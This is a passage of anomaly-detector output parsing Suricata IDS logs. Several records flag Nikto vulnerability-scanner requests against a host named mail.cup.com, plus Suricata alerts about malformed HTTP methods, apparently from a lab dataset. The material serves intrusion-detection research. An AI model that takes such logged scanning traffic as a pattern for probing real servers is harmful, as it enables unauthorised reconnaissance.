"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cobalt\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cobalt\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cobalt\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cobalt\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cobalt\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cobalt\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cobalt", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cobalt", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46928, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":246780214773980,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 246780214773980, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.330734+0000\",\"flow_id\":246780214773980,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cobalt\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cobalt\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.332241 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46930 -> 192.168.10.154:80", "/parser/model/time": 1583349514.332241, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46930, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.332241 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46930 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.nsfdeslo", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.332343+0000\",\"flow_id\":66060875861775,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsfdeslo\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsfdeslo\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.332343, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":66060875861775,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsfdeslo\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsfdeslo\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsfdeslo\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsfdeslo\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.nsfdeslo\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.nsfdeslo\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.nsfdeslo", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.nsfdeslo", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46930, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":66060875861775,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 66060875861775, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.332343+0000\",\"flow_id\":66060875861775,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46930,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.nsfdeslo\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.nsfdeslo\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.333976 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46932 -> 192.168.10.154:80", "/parser/model/time": 1583349514.333976, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46932, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.333976 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46932 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.old", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.334225+0000\",\"flow_id\":1835810740114780,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.old\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.old\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.334225, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1835810740114780,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.old\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.old\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.old\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.old\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.old\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.old\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.old", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.old", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46932, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1835810740114780,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1835810740114780, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.334225+0000\",\"flow_id\":1835810740114780,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46932,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.old\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.old\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.336929 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46934 -> 192.168.10.154:80", "/parser/model/time": 1583349514.336929, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46934, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.336929 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46934 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.34 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", 